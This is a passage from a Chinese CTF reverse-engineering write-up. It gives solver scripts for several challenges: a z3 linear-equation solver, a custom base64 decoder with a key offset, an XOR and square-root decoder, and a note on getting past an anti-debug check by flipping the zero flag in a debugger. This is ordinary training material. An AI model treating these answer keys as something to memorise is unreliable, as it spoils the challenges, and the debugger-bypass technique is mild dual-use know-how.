    ([922, 399, 425, 26, 159, 224, 438, 770, 144, 406, 110, 991, 749, 701, 646, 147, 979, 674, 999, 913], 717586),
    ([13, 537, 225, 421, 153, 484, 654, 743, 779, 74, 325, 439, 797, 41, 784, 269, 454, 0, 725, 164], 537823),
    ([591, 210, 874, 204, 485, 42, 433, 176, 436, 634, 82, 978, 818, 683, 404, 562, 41, 789, 200, 220], 587367),
    ([584, 597, 928, 532, 902, 858, 820, 240, 124, 899, 848, 822, 409, 491, 587, 715, 410, 268, 721, 915], 842245),
    ([421, 302, 327, 180, 512, 160, 623, 28, 411, 53, 633, 560, 623, 477, 901, 287, 149, 726, 934, 875], 610801),
    ([838, 434, 792, 649, 462, 170, 980, 15, 295, 495, 666, 934, 17, 69, 367, 780, 291, 834, 587, 133], 653127),
    ([41, 422, 420, 224, 475, 854, 233, 179, 620, 69, 42, 684, 300, 745, 894, 554, 495, 66, 316, 391], 533470),
]

for coeffs, rhs in EQUATIONS:
    # coeffs[j] multiplies k[20 - j]
    s.add(sum(c * k[20 - j] for j, c in enumerate(coeffs)) == rhs)

if s.check() == sat:
    ans = s.model()
    for i in range(1, 21):
        print(chr(ans[k[i]].as_long()), end='')

[Week2] 最简单的编码:

只能用脚本解,减去对应的key

table = "CDABGHEFKLIJOPMNSTQRWXUVabYZefcdijghmnklqropuvstyzwx23016745+/89"
enc = "TqK1YUSaQryEMHaLMnWhYU+Fe0WPenqhRXahfkV6WE2fa3iRW197Za62eEaD"
number = [1, 2, 3, 4]

# custom base64: each character's index in `table`, minus a position-dependent offset, reduced mod 64
index = [(table.index(ch) - number[pos % 4]) % 64 for pos, ch in enumerate(enc)]
print(index)

# regroup every four 6-bit values into three bytes, most significant byte first
for start in range(0, len(index), 4):
    a, b, c, d = index[start:start + 4]
    word = a << 18 | b << 12 | c << 6 | d
    for shift in (16, 8, 0):
        print(chr((word >> shift) & 0xff), end="")

[Week3] Dont-debug-me:

考察反调试

这里才是输出flag的地方

这里不输入1,且不在调试则可以输出flag。但是运行完会直接退出,所以进行调试,并修改ZF标志位进行跳转,让程序输出flag即可。

 

[Week3] 出题人已疯:

import libnum

# the long decoy text is part of the key material: character i % len(string) is XORed into entry i
string= ("你以为我还会在乎吗?\ud83d\ude2c\ud83d\ude2c\ud83d\ude2c我在昆仑山练了六年的剑\ud83d\ude1f\ud83d\ude1f\ud83d\ude1f我的心早就和昆仑山的雪一样冷了\ud83d\ude10\ud83d\ude10\ud83d\ude10我在大润发杀了十年的鱼\ud83d\ude2b\ud83d\ude2b\ud83d\ude2b我以为我的心早已跟我的刀一样冷了\ud83d\ude29\ud83d\ude29\ud83d\ude29"
      "我早上坐公交滴卡的时候和司机大叔说“两个人”,司机惊讶地看着我“你明明就是一个人,为什么要滴两个人的卡?”我回他,“我心中还有一个叫Kengwang的。”司机回我说,“天使是不用收钱的。”"
      "(尖叫)(扭曲)(阴暗的爬行)(扭动)(阴暗地蠕动)(翻滚)(激烈地爬动)(痉挛)(嘶吼)(蠕动)(阴森的低吼)(爬行)(分裂)(走上岸)(扭曲的行走)(不分对象攻击)"
      "地球没我照样转?硬撑罢了!地球没我照样转?硬撑罢了!地球没我照样转?硬撑罢了!地球没我照样转?硬撑罢了!地球没我照样转?硬撑罢了!地球没我照样转?硬撑罢了!"
      "扭曲上勾拳!阴暗的下勾拳!尖叫左勾拳!右勾拳爬行!扭动扫堂腿!分裂回旋踢!这是蜘蛛阴暗的吃耳屎,这是龙卷风翻滚停车场!乌鸦痉挛!老鼠嘶吼!大象蠕动!愤怒的章鱼!无差别攻击!无差别攻击!无差别攻击!")
enc = [
    24164, 27173, 32145, 17867, 40533, 21647, 17418, 30032, 27950, 62998,
    60750, 64870, 52680, 61797, 49234, 59762, 16704, 19200, 32132, 24038,
    21764, 30130, 28113, 23070, 27413, 27917, 28938, 50207, 64834, 60132,
    64832, 63334, 55103, 22176, 21991, 20073, 22281, 19476, 28302, 24336,
    24720, 19544, 23018, 43976,
]

# undo the two XOR masks (index and decoy character), then take the integer square root
flag = ''
for i, value in enumerate(enc):
    unmasked = value ^ i ^ ord(string[i % len(string)])
    flag += chr(libnum.nroot(unmasked, 2))

print(flag)
